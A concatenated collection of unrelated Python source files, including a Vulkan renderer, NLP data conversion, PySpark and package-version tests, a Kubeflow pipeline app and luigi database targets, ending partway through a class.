'ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format(
points.shape[0])
)
def save_gallery(preds,samples,names,gallery_id,epoch):
pred = preds[0].cpu()
sample = samples[0].transpose(0, 1).cpu()
name = names[0]
save_gallery_path = os.path.join(gallery_id,name.split('/')[-2],"epoch_{:03d}".format(epoch))
os.makedirs(save_gallery_path,exist_ok=True)
path = os.path.join(save_gallery_path,'pred.ply')
save_samples_truncted_prob(path,sample,pred)
|
61386
|
from vulkan import vk, helpers as hvk
class Renderer(object):
def __init__(self, engine):
self.engine = engine
self.image_ready = None
self.rendering_done = None
self.render_fences = ()
self.render_cache = {}
self.enabled = True
self._setup_sync()
self._setup_render_cache()
def free(self):
engine, api, device = self.ctx
hvk.destroy_semaphore(api, device, self.image_ready)
hvk.destroy_semaphore(api, device, self.rendering_done)
for f in self.render_fences:
hvk.destroy_fence(api, device, f)
del self.engine
@property
def ctx(self):
engine = self.engine
api, device = engine.api, engine.device
return engine, api, device
def render(self, scene_data):
if not self.enabled:
return
h = hvk
engine, api, device = self.ctx
render_queue = engine.render_queue.handle
rc = self.render_cache
image_index, result = h.acquire_next_image(api, device, engine.swapchain, semaphore = self.image_ready)
fence = self.render_fences[image_index]
h.wait_for_fences(api, device, (fence,))
h.reset_fences(api, device, (fence,))
scene_data.record(image_index)
submit = rc["submit_info"]
submit.command_buffers[0] = scene_data.render_commands[image_index]
h.queue_submit(api, render_queue, (submit,), fence = fence)
present = rc["present_info"]
present.image_indices[0] = image_index
h.queue_present(api, render_queue, present)
def enable(self):
self.enabled = True
def disable(self):
_, api, device = self.ctx
hvk.device_wait_idle(api, device)
self.enabled = False
def _setup_sync(self):
engine, api, device = self.ctx
info = hvk.semaphore_create_info()
self.image_ready = hvk.create_semaphore(api, device, info)
self.rendering_done = hvk.create_semaphore(api, device, info)
self.render_fences = []
info = hvk.fence_create_info(flags=vk.FENCE_CREATE_SIGNALED_BIT)
for _ in range(len(engine.render_target.swapchain_images)):
self.render_fences.append(hvk.create_fence(api, device, info))
def _setup_render_cache(self):
engine = self.engine
self.render_cache["submit_info"] = hvk.submit_info(
wait_dst_stage_mask = (vk.PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT,),
wait_semaphores = (self.image_ready,),
signal_semaphores = (self.rendering_done,),
command_buffers = (0,)
)
self.render_cache["present_info"] = hvk.present_info(
swapchains = (engine.swapchain,),
image_indices = (0,),
wait_semaphores = (self.rendering_done,)
)
|
61435
|
import sys
from collections import namedtuple, defaultdict
import concrete
from concrete.util import CommunicationReader
import numpy as np
import json
Mention = namedtuple("Mention", "text start end sentence entityType confidence uuid")
def get_entities(comm, entity_tool):
"""
Returns:
list of concrete.Entity objects
"""
entity_set_index = concrete.util.metadata.get_index_of_tool(
comm.entitySetList, entity_tool)
if entity_set_index == -1:
print(f"Could not find EntitySet with tool name {entity_tool}")
return []
else:
return comm.entitySetList[entity_set_index].entityList
def comm_to_dict(comm, entity_tool):
output_dict = {}
output_dict['doc_id'] = comm.id
# Assume single section in sectionList
sentences = []
sentence_tokenization_uuids = {}
offset_dicts = {
"idx_to_char_offsets": {},
"char_offsets_to_idx": {}
}
# Read comm into list of tokenized sentences.
for i, sentence in enumerate(comm.sectionList[0].sentenceList):
sentence_tokenization_uuids[i] = sentence.tokenization.uuid.uuidString
sentence_text = []
idx_to_char_offsets = {}
char_offsets_to_idx = {}
for token in sentence.tokenization.tokenList.tokenList:
token_idx = token.tokenIndex
token_start = token.textSpan.start
token_ending = token.textSpan.ending
token = token.text
sentence_text.append(token)
idx_to_char_offsets[token_idx] = (token_start, token_ending)
char_offsets_to_idx[(token_start, token_ending)] = token_idx
offset_dicts["idx_to_char_offsets"][i] = idx_to_char_offsets
offset_dicts["char_offsets_to_idx"][i] = char_offsets_to_idx
sentences.append(sentence_text)
output_dict["sentences"] = sentences
output_dict["offset_dicts"] = offset_dicts
# Compute offsets
sentence_offsets = np.cumsum([0] + [len(s) for s in sentences])
tokenization_to_sent = {uuid:idx
for idx, uuid in sentence_tokenization_uuids.items()}
output_dict['entity_set_list'] = []
# Read through entity mention set list
mention_list = []
mention_uuid_map = {}
mention_skip_map = {}
for ms_idx, mention_set in enumerate(comm.entityMentionSetList):
# print ("{} mention_list: {}".format(ms_idx, len(mention_set.mentionList)))
for mention in mention_set.mentionList:
tokens = mention.tokens.tokenIndexList
tokenizationId = mention.tokens.tokenizationId
sentId = tokenization_to_sent[mention.tokens.tokenizationId.uuidString]
sent_toks = [sentences[sentId][idx] for idx in tokens]
m = Mention(text=mention.text,
start=min(tokens),
end=max(tokens),
sentence=sentId,
entityType=mention.entityType,
confidence=mention.confidence,
uuid=mention.uuid)
mention_list.append(m)
mention_uuid_map[mention.uuid.uuidString] = m
output_dict['mentions'] = [(int(sentence_offsets[m.sentence] + m.start),
int(sentence_offsets[m.sentence] + m.end))
for m in mention_list]
# Convert Mention to doc-level (start, end) and update mapping
mention_map = defaultdict(list)
for m in mention_list:
start = int(sentence_offsets[m.sentence] + m.start)
end = int(sentence_offsets[m.sentence] + m.end)
mention_map[(start, end)].append(m)
output_dict["mention_map"] = mention_map
output_dict["clusters"] = []
# Get entity set list using entity_tool
if entity_tool is not None:
entity_list = get_entities(comm, entity_tool)
uuid_clusters = []
print (f"Found entity list with {len(entity_list)} entities")
for entity in entity_list:
if entity.mentionIdList:
uuid_clusters.append(entity.mentionIdList)
mention_count = 0
clusters = []
seen = set()
for cluster in uuid_clusters:
entity_list = []
for mention_uuid in cluster:
if mention_uuid.uuidString not in seen:
seen.add(mention_uuid.uuidString)
else:
print(f"{mention_uuid} in two different clusters")
m = mention_uuid_map[mention_uuid.uuidString]
start = int(sentence_offsets[m.sentence] + m.start)
end = int(sentence_offsets[m.sentence] + m.end)
entity_list.append([start, end])
if entity_list:
clusters.append(entity_list)
# Ensure every mention is used in exactly one cluster
assert(len(mention_uuid_map) == len(seen))
output_dict["clusters"] = clusters
return (output_dict, comm)
def make_data_iter(path, entity_tool):
for (comm, filename) in CommunicationReader(path):
print (f"Entity_tool: {entity_tool}")
yield comm_to_dict(comm, entity_tool)
if __name__ == "__main__":
input_comms = sys.argv[1]
output_file = sys.argv[2]
if len(sys.argv) > 3:
entity_tool = sys.argv[3]
else:
entity_tool = None
examples_iter = make_data_iter(input_comms, entity_tool)
output_file = open(output_file, 'w+')
for example, _ in examples_iter:
clean_version = {
"sentences": example["sentences"],
"doc_key": example["doc_id"],
}
if example["clusters"]:
clean_version["clusters"] = example["clusters"]
else:
clean_version["clusters"] = [[span] for span in set(example["mentions"])]
num_clusters = len(clean_version["clusters"])
num_mentions = sum([len(cluster) for cluster in clean_version["clusters"]])
num_total_mentions = sum([len(mention) for mention in example["mention_map"].values()])
print(f"Wrote {num_clusters} clusters and {num_mentions} mentions" +
f" (out of {num_total_mentions}) to {clean_version['doc_key']}")
output_file.write(json.dumps(clean_version) + "\n")
|
61441
|
import os
from koala.server import koala_host
from koala.server.fastapi import *
from sample.fastapi.http_api import *
import sample.player
koala_host.init_server(globals().copy(), f"{os.getcwd()}/sample/app.yaml")
koala_host.use_pd()
koala_host.listen_fastapi()
koala_host.run_server()
|
61464
|
from pyspark.sql.types import (
ArrayType,
IntegerType,
StringType,
StructField,
StructType,
)
from butterfree.extract.pre_processing import explode_json_column
from butterfree.testing.dataframe import (
assert_dataframe_equality,
create_df_from_collection,
)
def test_explode_json_column(spark_context, spark_session):
# arrange
input_data = [{"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}]
target_data = [
{
"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}',
"a": 123,
"b": "abc",
"c": 123,
"d": [1, 2, 3],
}
]
input_df = create_df_from_collection(input_data, spark_context, spark_session)
target_df = create_df_from_collection(target_data, spark_context, spark_session)
json_column_schema = StructType(
[
StructField("a", IntegerType()),
StructField("b", StringType()),
StructField("c", IntegerType()),
StructField("d", ArrayType(IntegerType())),
]
)
# act
output_df = explode_json_column(input_df, "json_column", json_column_schema)
    # assert
assert_dataframe_equality(target_df, output_df)
|
61470
|
ROTATED_PROXY_ENABLED = True
PROXY_STORAGE = 'scrapy_rotated_proxy.extensions.file_storage.FileProxyStorage'
PROXY_FILE_PATH = ''
# PROXY_STORAGE = 'scrapy_rotated_proxy.extensions.mongodb_storage.MongoDBProxyStorage'
PROXY_MONGODB_HOST = '127.0.0.1'
PROXY_MONGODB_PORT = 27017
PROXY_MONGODB_USERNAME = None
PROXY_MONGODB_PASSWORD = None
PROXY_MONGODB_AUTH_DB = 'admin'
PROXY_MONGODB_DB = 'proxy_management'
PROXY_MONGODB_COLL = 'proxy'
PROXY_MONGODB_COLL_INDEX = []
PROXY_SLEEP_INTERVAL = 60*60*24
PROXY_SPIDER_CLOSE_WHEN_NO_PROXY = True
PROXY_RELOAD_ENABLED = False
|
61540
|
import sys
import os
sys.path.append(os.path.abspath("./"))
from nnst import downloader as downloader
import pprint
import argparse
import nnst.nnst as nnst
parser=argparse.ArgumentParser()
parser.add_argument('--csv_path', help='path to the CSV file')
parser.add_argument('--date', help='start date of the news to crawl (YYYYMMDD)')
parser.add_argument('--num', help='number of news articles to parse')
parser.add_argument('--num_train', help='training set size')
csv_path = 'csv/NNST_data.csv'
date = '20180914'
num = 1000
num_train = 900
print(parser.format_help())
args = parser.parse_args().__dict__
if args['csv_path'] is not None:
csv_path = str(args['csv_path'])
if args['date'] is not None:
date = str(args['date'])
if args['num'] is not None:
num = int(args['num'])
if args['num_train'] is not None:
num_train = int(args['num_train'])
downloader.download(num, csv_path, date)
data = nnst.load_data(csv_path)
train, test = nnst.div_dataset(data, train_size=num_train)
print('------train set------')
pprint.pprint(train)
print('---------------------\n')
print('------test set------')
pprint.pprint(test)
print('---------------------\n')
batch = nnst.random_batch(train,batch_size=100)
print('------batch set------')
pprint.pprint(batch)
print('---------------------')
|
61554
|
import pytest
import aos_version
from collections import namedtuple
Package = namedtuple('Package', ['name', 'version'])
expected_pkgs = {
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
},
}
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
# all found
[Package('spam', '3.2.1'), Package('eggs', '3.2.1')],
expected_pkgs,
),
(
# found with more specific version
[Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')],
expected_pkgs,
),
(
[Package('ovs', '2.6'), Package('ovs', '2.4')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_precise_version_found(pkgs, expected_pkgs_dict):
aos_version._check_precise_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expect_not_found', [
(
[],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # none found
),
(
[Package('spam', '3.2.1')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # completely missing
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # not the right version
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
}
}, # eggs found with multiple versions
),
])
def test_check_precise_version_found_fail(pkgs, expect_not_found):
with pytest.raises(aos_version.PreciseVersionNotFound) as e:
aos_version._check_precise_version_found(pkgs, expected_pkgs)
assert list(expect_not_found.values()) == e.value.problem_pkgs
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
[],
expected_pkgs,
),
(
# more precise but not strictly higher
[Package('spam', '3.2.1.9')],
expected_pkgs,
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_higher_version_found(pkgs, expected_pkgs_dict):
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [
(
[Package('spam', '3.3')],
expected_pkgs,
['spam-3.3'], # lower precision, but higher
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
expected_pkgs,
['eggs-3.3.2'], # one too high
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
expected_pkgs,
['eggs-3.4'], # multiple versions, one is higher
),
(
[Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')],
expected_pkgs,
['eggs-3.4'], # multiple versions, two are higher
),
(
[Package('ovs', '2.8')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
['ovs-2.8'],
),
])
def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher):
with pytest.raises(aos_version.FoundHigherVersion) as e:
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
assert set(expect_higher) == set(e.value.problem_pkgs)
@pytest.mark.parametrize('pkgs', [
[],
[Package('spam', '3.2.1')],
[Package('spam', '3.2.1'), Package('eggs', '3.2.2')],
])
def test_check_multi_minor_release(pkgs):
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [
(
[Package('spam', '3.2.1'), Package('spam', '3.3.2')],
['spam'],
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
['eggs'],
),
])
def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs):
with pytest.raises(aos_version.FoundMultiRelease) as e:
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
|
61564
|
import torch
import torch.nn.functional as F
__all__ = ['kl_loss', 'huber_loss']
def kl_loss(x, y):
x = F.softmax(x.detach(), dim=1)
y = F.log_softmax(y, dim=1)
return torch.mean(torch.sum(x * (torch.log(x) - y), dim=1))
def huber_loss(error, delta):
abs_error = torch.abs(error)
quadratic = torch.min(abs_error, torch.full_like(abs_error, fill_value=delta))
losses = 0.5 * (quadratic ** 2) + delta * (abs_error - quadratic)
return torch.mean(losses)
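# Hedged usage sketch (not part of the original module):
if __name__ == '__main__':
    logits_a = torch.randn(8, 10)
    logits_b = torch.randn(8, 10)
    print('kl loss   :', kl_loss(logits_a, logits_b).item())
    print('huber loss:', huber_loss(logits_a - logits_b, delta=1.0).item())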
|
61586
|
from . import BasicType
class MaskPosition(BasicType):
fields = {
'point': str,
'x_shift': str,
'y_shift': str,
'scale': str
}
def __init__(self, obj=None):
super(MaskPosition, self).__init__(obj)
@classmethod
def a(cls, point: str, x_shift: str, y_shift: str, scale: str):
return super().a(**locals())
|
61589
|
import os
from setuptools import setup, find_packages
base_dir = os.path.dirname(os.path.abspath(__file__))
setup(
name='hcipy',
version="0.0.1",
description="A pure python library for Bluetooth LE that has minimal dependencies.",
#long_description="\n\n".join([
# open(os.path.join(base_dir, "README.md"), "r").read(),
#]),
long_description="A pure Python module written using only the Python standard library for interacting with the Bluetooth HCI.",
url='https://github.com/TheBubbleworks/python-hcipy',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[],
#tests_require=tests_require,
#test_suite="setup.test_suite",
platforms=['Raspberry Pi', 'Linux'],
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=['Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2',
'Environment :: Console',
'Intended Audience :: Developers',
'Operating System :: POSIX',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
61595
|
from chemeco.wrappers.database import sklearn_db
from chemeco.wrappers.database import cheml_db
from chemeco.wrappers.database import pandas_db
import inspect
def tshf():
"""
tshf stands for the combination of task, subtask, host, and function
:return: combination, dictionary of the aforementioned combinations
"""
    # 8 tasks
tasks = ['Enter', 'Represent', 'Prepare', 'Model', 'Search', 'Mix', 'Visualize', 'Store']
extras = ['np', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'mask', 'Input', 'Output',
'Parameter', 'req', 'regression_types', 'cv_classes']
combination = {task: {} for task in tasks}
all_classes = [k[1] for k in inspect.getmembers(sklearn_db) if k[0][0:2]!='__']
all_classes += [k[1] for k in inspect.getmembers(cheml_db) if k[0][0:2]!='__' ]
all_classes += [k[1] for k in inspect.getmembers(pandas_db) if k[0][0:2]!='__' ]
for k in all_classes:
vk = vars(k)
if 'task' in vk and 'subtask' in vk:
task, subtask, host, function = [vk['task'], vk['subtask'], vk['host'], vk['function']]
if subtask not in combination[task]:
combination[task][subtask] = {host: [function]}
else:
if host not in combination[task][subtask]:
combination[task][subtask][host] = [function]
else:
combination[task][subtask][host].append(function)
return tasks, combination
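# Hedged usage sketch (not part of the original module):
if __name__ == '__main__':
    tasks, combination = tshf()
    for task in tasks:
        print(task, '->', sorted(combination[task]))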
|
61603
|
import logging
import click
from kfp import dsl
from typing import List, Dict, Callable
from hypermodel.hml.hml_pipeline import HmlPipeline
from hypermodel.hml.hml_container_op import HmlContainerOp
from hypermodel.platform.abstract.services import PlatformServicesBase
@click.group(name="pipelines")
@click.pass_context
def cli_pipeline_group(context):
pass
class HmlPipelineApp:
def __init__(
self,
name: str,
services: PlatformServicesBase,
cli: click.Group,
image_url: str,
package_entrypoint: str,
envs: Dict[str, str]
):
if name is None or name == "":
raise(TypeError("Parameter: `name` must be supplied"))
if services is None:
raise(TypeError("Parameter: `services` must be supplied"))
if cli is None:
raise(TypeError("Parameter: `cli` must be supplied"))
self.name = name
self.services = services
self.cli_root = cli
self.cli_root.add_command(cli_pipeline_group)
self.envs = envs
self.image_url = image_url
self.package_entrypoint = package_entrypoint
self.pipelines: Dict[str, HmlPipeline] = dict()
self.deploy_callbacks: List[Callable[[HmlContainerOp], HmlContainerOp]] = []
def __getitem__(self, key: str) -> HmlPipeline:
"""
        Get a reference to an `HmlPipeline` previously registered with this app
        (looked up from `self.pipelines`)
"""
return self.pipelines[key]
def register_pipeline(self, pipeline_func, cron: str, experiment: str):
"""
Register a Kubeflow Pipeline (e.g. a function decorated with @hml.pipeline)
Args:
            pipeline_func (Callable): The function defining the pipeline
            cron (str): A cron expression for the default job executing this pipeline
            experiment (str): The kubeflow experiment to deploy the job to
        Returns:
            None
"""
pipe = HmlPipeline(
cli=cli_pipeline_group,
pipeline_func=pipeline_func,
services=self.services,
image_url=self.image_url,
package_entrypoint=self.package_entrypoint,
op_builders=self.deploy_callbacks,
envs=self.envs
)
pipe.with_cron(cron)
pipe.with_experiment(experiment)
self.pipelines[pipe.name] = pipe
return pipe
def initialize(self):
for k in self.pipelines:
pipe = self.pipelines[k]
pipe._build_dag()
def on_deploy(self, func: Callable[[HmlContainerOp], HmlContainerOp]):
"""
Registers a function to be called for each ContainerOp defined in the Pipeline
to enable us to configure the Operations within the container with secrets,
environment variables and whatever else may be required.
Args:
            func (Callable): The function (accepting an HmlContainerOp as its only parameter)
                which configures the supplied HmlContainerOp
"""
self.deploy_callbacks.append(func)
return self
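# Hypothetical usage sketch (names such as `my_services`, `cli_root` and
# `my_pipeline_func` are placeholders, not part of this module):
#   app = HmlPipelineApp(name="demo", services=my_services, cli=cli_root,
#                        image_url="gcr.io/acme/demo:latest",
#                        package_entrypoint="demo-app", envs={})
#   app.on_deploy(lambda op: op)  # configure each HmlContainerOp before deployment
#   app.register_pipeline(my_pipeline_func, cron="0 * * * *", experiment="dev")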
|
61614
|
import os
import requests
from urllib.error import URLError
from urllib.parse import urlparse
from urllib.request import urlopen
from luigi import Target, LocalTarget
from hashlib import sha1
from tasks.util import (query_cartodb, underscore_slugify, OBSERVATORY_PREFIX, OBSERVATORY_SCHEMA)
from tasks.meta import (OBSColumn, OBSTable, metadata, Geometry, Point,
Linestring, OBSColumnTable, OBSTag, current_session)
from sqlalchemy import Table, types, Column
from lib.logger import get_logger
LOGGER = get_logger(__name__)
class PostgresTarget(Target):
'''
PostgresTarget which by default uses command-line specified login.
'''
def __init__(self, schema, tablename, non_empty=True, where="1 = 1"):
self._schema = schema
self._tablename = tablename
self._non_empty = non_empty
self._where = where
@property
def table(self):
return '"{schema}".{tablename}'.format(schema=self._schema,
tablename=self._tablename)
@property
def tablename(self):
return self._tablename
@property
def schema(self):
return self._schema
@property
def qualified_tablename(self):
return '"{}".{}'.format(self.schema, self.tablename)
def _existenceness(self):
'''
Returns 0 if the table does not exist, 1 if it exists but has no
rows (is empty), and 2 if it exists and has one or more rows.
'''
session = current_session()
sql = '''
SELECT COUNT(*) FROM information_schema.tables
WHERE table_schema ILIKE '{schema}'
AND table_name ILIKE '{tablename}'
'''.format(
schema=self._schema,
tablename=self._tablename)
resp = session.execute(sql)
if int(resp.fetchone()[0]) == 0:
return 0
resp = session.execute(
'SELECT row_number() over () FROM "{schema}".{tablename} WHERE {where} LIMIT 1'.format(
schema=self._schema, tablename=self._tablename,
where=self._where))
if resp.fetchone() is None:
return 1
else:
return 2
def empty(self):
'''
Returns True if the table exists but has no rows in it.
'''
return self._existenceness() == 1
def exists(self):
'''
Returns True if the table exists and has at least one row in it.
'''
if self._non_empty:
return self._existenceness() == 2
else:
return self._existenceness() >= 1
def exists_or_empty(self):
'''
Returns True if the table exists, even if it is empty.
'''
return self._existenceness() >= 1
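# Hypothetical usage sketch (schema/table names are placeholders):
#   target = PostgresTarget('observatory', 'obs_mytable')
#   target.exists()   # True only if the table exists and has at least one row
#   target.empty()    # True if the table exists but has no rows
#   PostgresTarget('observatory', 'obs_mytable', non_empty=False).exists()
#                     # True as soon as the table exists, even if empty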
class CartoDBTarget(Target):
'''
Target which is a CartoDB table
'''
def __init__(self, tablename, carto_url=None, api_key=None):
self.tablename = tablename
self.carto_url = carto_url
self.api_key = api_key
def __str__(self):
return self.tablename
def exists(self):
resp = query_cartodb(
'SELECT row_number() over () FROM "{tablename}" LIMIT 1'.format(
tablename=self.tablename),
api_key=self.api_key,
carto_url=self.carto_url)
if resp.status_code != 200:
return False
return resp.json()['total_rows'] > 0
def remove(self, carto_url=None, api_key=None):
api_key = api_key or os.environ['CARTODB_API_KEY']
try:
while True:
resp = requests.get('{url}/api/v1/tables/{tablename}?api_key={api_key}'.format(
url=carto_url,
tablename=self.tablename,
api_key=api_key
))
viz_id = resp.json()['id']
# delete dataset by id DELETE
# https://observatory.cartodb.com/api/v1/viz/ed483a0b-7842-4610-9f6c-8591273b8e5c
try:
requests.delete('{url}/api/v1/viz/{viz_id}?api_key={api_key}'.format(
url=carto_url,
viz_id=viz_id,
api_key=api_key
), timeout=1)
except requests.Timeout:
pass
except ValueError:
pass
query_cartodb('DROP TABLE IF EXISTS {tablename}'.format(tablename=self.tablename))
assert not self.exists()
class ColumnTarget(Target):
'''
'''
def __init__(self, column, task):
self._id = column.id
self._task = task
self._column = column
def get(self, session):
'''
Return a copy of the underlying OBSColumn in the specified session.
'''
with session.no_autoflush:
return session.query(OBSColumn).get(self._id)
def update_or_create(self):
self._column = current_session().merge(self._column)
def exists(self):
existing = self.get(current_session())
new_version = float(self._column.version or 0.0)
if existing:
existing_version = float(existing.version or 0.0)
current_session().expunge(existing)
else:
existing_version = 0.0
if existing and existing_version == new_version:
return True
elif existing and existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
class TagTarget(Target):
'''
'''
def __init__(self, tag, task):
self._id = tag.id
self._tag = tag
self._task = task
_tag_cache = {}
def get(self, session):
'''
Return a copy of the underlying OBSTag in the specified session.
'''
if not self._tag_cache.get(self._id, None):
with session.no_autoflush:
self._tag_cache[self._id] = session.query(OBSTag).get(self._id)
return self._tag_cache[self._id]
def update_or_create(self):
with current_session().no_autoflush:
self._tag = current_session().merge(self._tag)
def exists(self):
session = current_session()
existing = self.get(session)
new_version = self._tag.version or 0.0
if existing:
if existing in session:
session.expunge(existing)
existing_version = existing.version or 0.0
if float(existing_version) == float(new_version):
return True
if existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
class TableTarget(Target):
def __init__(self, schema, name, obs_table, columns, task):
'''
columns: should be an ordereddict if you want to specify columns' order
in the table
'''
self._id = '.'.join([schema, name])
obs_table.id = self._id
obs_table.tablename = '{prefix}{name}'.format(prefix=OBSERVATORY_PREFIX, name=sha1(
underscore_slugify(self._id).encode('utf-8')).hexdigest())
self.table = '{schema}.{table}'.format(schema=OBSERVATORY_SCHEMA, table=obs_table.tablename)
self.qualified_tablename = '"{schema}".{table}'.format(schema=OBSERVATORY_SCHEMA, table=obs_table.tablename)
self.obs_table = obs_table
self._tablename = obs_table.tablename
self._schema = schema
self._name = name
self._obs_dict = obs_table.__dict__.copy()
self._columns = columns
self._task = task
if obs_table.tablename in metadata.tables:
self._table = metadata.tables[obs_table.tablename]
else:
self._table = None
@property
def tablename(self):
return self._tablename
@property
def schema(self):
return 'observatory'
def sync(self):
'''
Whether this data should be synced to carto. Defaults to True.
'''
return True
def exists(self):
'''
We always want to run this at least once, because we can always
regenerate tabular data from scratch.
'''
session = current_session()
existing = self.get(session)
new_version = float(self.obs_table.version or 0.0)
if existing:
existing_version = float(existing.version or 0.0)
if existing in session:
session.expunge(existing)
else:
existing_version = 0.0
if existing and existing_version == new_version:
resp = session.execute(
'SELECT COUNT(*) FROM information_schema.tables '
"WHERE table_schema = '{schema}' "
" AND table_name = '{tablename}' ".format(
schema='observatory',
tablename=existing.tablename))
if int(resp.fetchone()[0]) == 0:
return False
resp = session.execute(
'SELECT row_number() over () '
'FROM "{schema}".{tablename} LIMIT 1 '.format(
schema='observatory',
tablename=existing.tablename))
return resp.fetchone() is not None
elif existing and existing_version > new_version:
raise Exception('Metadata version mismatch: cannot run task {task} '
'(id "{id}") '
'with ETL version ({etl}) older than what is in '
'DB ({db})'.format(task=self._task.task_id,
id=self._id,
etl=new_version,
db=existing_version))
return False
def get(self, session):
'''
Return a copy of the underlying OBSTable in the specified session.
'''
with session.no_autoflush:
return session.query(OBSTable).get(self._id)
def update_or_create_table(self):
session = current_session()
# create new local data table
columns = []
for colname, coltarget in list(self._columns.items()):
colname = colname.lower()
col = coltarget.get(session)
# Column info for sqlalchemy's internal metadata
if col.type.lower() == 'geometry':
coltype = Geometry
elif col.type.lower().startswith('geometry(point'):
coltype = Point
elif col.type.lower().startswith('geometry(linestring'):
coltype = Linestring
# For enum type, pull keys from extra["categories"]
elif col.type.lower().startswith('enum'):
cats = list(col.extra['categories'].keys())
coltype = types.Enum(*cats, name=col.id + '_enum')
else:
coltype = getattr(types, col.type.capitalize())
columns.append(Column(colname, coltype))
obs_table = self.get(session) or self.obs_table
# replace local data table
if obs_table.id in metadata.tables:
metadata.tables[obs_table.id].drop()
self._table = Table(obs_table.tablename, metadata, *columns,
extend_existing=True, schema='observatory')
session.commit()
self._table.drop(checkfirst=True)
self._table.create()
def update_or_create_metadata(self, _testmode=False):
session = current_session()
# replace metadata table
self.obs_table = session.merge(self.obs_table)
obs_table = self.obs_table
for i, colname_coltarget in enumerate(self._columns.items()):
colname, coltarget = colname_coltarget
colname = colname.lower()
col = coltarget.get(session)
if _testmode:
coltable = OBSColumnTable(colname=colname, table=obs_table,
column=col)
else:
# Column info for obs metadata
coltable = session.query(OBSColumnTable).filter_by(
column_id=col.id, table_id=obs_table.id).first()
if coltable:
coltable.colname = colname
else:
# catch the case where a column id has changed
coltable = session.query(OBSColumnTable).filter_by(
table_id=obs_table.id, colname=colname).first()
if coltable:
coltable.column = col
else:
coltable = OBSColumnTable(colname=colname, table=obs_table,
column=col)
session.add(coltable)
class RepoTarget(LocalTarget):
def __init__(self, schema, tablename, repo_dir, resource_id, version, filename):
self.format = None
self.is_tmp = False
self.schema = schema
self.tablename = tablename
self.repo_dir = repo_dir
self.resource_id = resource_id
self.version = version
self.filename = filename
@property
def path(self):
path = self._get_path()
if path and os.path.isfile(path):
return path
else:
return self._build_path()
def _build_path(self):
return os.path.join(self.repo_dir, self.resource_id, str(self.version), self.filename)
def _get_path(self):
path = None
query = '''
SELECT path FROM "{schema}".{table}
WHERE id = '{resource_id}'
AND version = {version}
'''.format(schema=self.schema,
table=self.tablename,
resource_id=self.resource_id,
version=self.version)
try:
result = current_session().execute(query).fetchone()
if result:
path = result[0]
except:
path = None
return path
def exists(self):
path = self._get_path()
return path and os.path.isfile(path)
class ConstraintExistsTarget(Target):
def __init__(self, schema, table, constraint):
self.schema = schema
self.tablename = table
self.constraint = constraint
self.session = current_session()
@property
def table(self):
return '"{schema}".{tablename}'.format(schema=self.schema,
tablename=self.tablename)
def exists(self):
sql = "SELECT 1 FROM information_schema.constraint_column_usage " \
"WHERE table_schema = '{schema}' " \
" AND table_name ilike '{table}' " \
" AND constraint_name = '{constraint}'"
check = sql.format(schema=self.schema,
table=self.tablename,
constraint=self.constraint)
return len(self.session.execute(check).fetchall()) > 0
class PostgresFunctionTarget(Target):
def __init__(self, schema, function_name):
self._schema = schema
self._function_name = function_name
self._session = current_session()
@property
def function(self):
return '"{schema}".{function_name}'.format(schema=self._schema,
